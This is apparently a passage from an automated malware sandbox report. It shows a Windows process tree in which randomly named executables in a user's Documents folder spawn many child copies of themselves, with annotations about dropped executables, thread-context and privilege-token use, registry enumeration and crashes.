    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:10784
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:13036
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:12372
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:1908
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:6024
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6024 -s 28
      4⤵
      Program crash
      PID:14164
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:8688
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:13844
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:12092
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:9980
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:14208
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:14736
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:14416
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:4308
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:15676
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:16116
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:15392
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:11564
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:16044
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:7836
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:15476
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:13920
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:2688
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:13836
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:11516
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:8424
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:9804
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:16648
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:16468
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:16728
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:13912
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:14296
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:14936
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:15904
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:13548
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:15844
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:11680
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:7796
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:16536
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:13016
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:17672
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:17932
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:3752
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:17568
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:13544
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:6476
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:17136
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:15492
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:18556
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:19080
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:19204
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:18824
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:19832
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:20268
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:19848
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:19152
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:5692
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:19352
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:19244
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:3728
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:18920
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:7328
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:16420
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:17628
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:20008
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:11328
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:16964
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:20856
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:21388
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:20528
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:21284
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:3248
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:21900
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:22608
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:17060
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:17164
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:22936
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:22392
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:19768
- C:\Users\Admin\Documents\hEjARv44mnptmc7nqphV0WYa.exe
  "C:\Users\Admin\Documents\hEjARv44mnptmc7nqphV0WYa.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2464
- C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
  "C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:1532
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    - Executes dropped EXE
    PID:3244
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    - Executes dropped EXE
    PID:5252
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    - Executes dropped EXE
    PID:5848
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    - Executes dropped EXE
    PID:5560
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    - Executes dropped EXE
    PID:4856
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    - Executes dropped EXE
    PID:2508
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2508 -s 164
      4⤵
      Program crash
      Checks processor information in registry
      Enumerates system info in registry
      PID:1376
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:5736
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:1196
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:5500
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:684
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:456
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:6344
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:6668
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:7028
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:4796
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:6484
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:6952
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:672
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:6816
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:2056
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:5964
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:4064
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:3784
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:5900
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:6908
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:7404
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:7824
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:3200
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:7728
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:1644
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:4436
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:5392
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:7708
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:7092
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:7612
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:8088
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:8488
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:8868
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:5988
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:6360
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:6844
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:8992
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:5908
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:6696
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:8740
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:5000
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:7504
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:6612
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:8796
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:9144
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:7432
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:2168
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:5512
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5512 -s 28
      4⤵
      Program crash
      PID:5284
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:6888
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:4460
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:6448
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:8400
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:4628
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:3660
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3660 -s 28
      4⤵
      Program crash
      PID:6732
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:8164
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:6680
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:6780
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:3676
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    - Checks processor information in registry
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:2384
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:236
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:6188
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:5112
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:6592
